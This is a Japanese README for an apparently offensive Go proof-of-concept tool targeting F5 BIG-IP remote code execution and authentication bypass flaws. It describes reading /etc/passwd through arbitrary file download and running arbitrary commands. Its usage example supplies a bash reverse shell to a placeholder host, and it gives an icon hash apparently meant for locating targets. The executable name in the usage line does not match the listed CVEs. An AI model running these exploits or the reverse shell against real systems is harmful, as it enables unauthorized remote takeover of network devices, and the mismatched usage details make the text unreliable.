
CVE-2020-5902 CVE-2021-22986 CVE-2022-1388 POCコレクション
Go言語で記述されたCVE-2020-5902、CVE-2021-22986、CVE-2022-1388のPOCコレクション。今後、F5の他のPOCも追加予定。
author:160team.west9B
※セキュリティ研究者が許可を得た場合にのみ使用してください。サイバーセキュリティ法を遵守し、発生したいかなる問題についても、作者は一切の責任を負いません。
F5 POC集:
CVE-2020-5902:F5 BIG-IP リモートコード実行脆弱性
CVE-2021-22986:F5 BIG-IP iControl REST 未認証リモートコマンド実行脆弱性
CVE-2022-1388:認証バイパスによるリモートコマンド実行
CVE-2020-5902の検証には任意のファイルダウンロードを使用し、/etc/passwdが返された場合、脆弱性が存在します。
CVE-2021-22986、CVE-2022-1388のPOCはデフォルトでidコマンドを実行し、{id}が返された場合、脆弱性が存在します。-cオプションでカスタムコマンドを指定可能。
usage: ./cve-2022-30525.exe -m exp -u url -c bash -i >& /dev/tcp/xxxx/1377 0>&1

icon_hash="-335242539"